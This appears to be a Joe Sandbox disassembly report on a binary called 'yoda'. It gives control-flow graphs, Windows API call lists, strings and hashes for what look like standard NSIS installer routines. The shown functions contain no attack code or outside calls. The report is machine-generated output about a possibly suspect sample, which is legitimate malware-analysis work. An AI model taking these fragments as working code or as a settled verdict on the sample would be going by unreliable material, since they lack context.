                                                                                                                                                                                                                                                                control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,%TechnoBecome%,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,%TechnoBecome%,%TechnoBecome%,00000000,00000000,%TechnoBecome%,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                • String ID: %TechnoBecome%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                • API String ID: 4286501637-2879760291
                                                                                                                                                                                                                                                                • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00427176,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                • String ID: (]C$... %d%%$pAB$vqB$y1B
                                                                                                                                                                                                                                                                • API String ID: 651206458-2710265387
                                                                                                                                                                                                                                                                • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                APIs
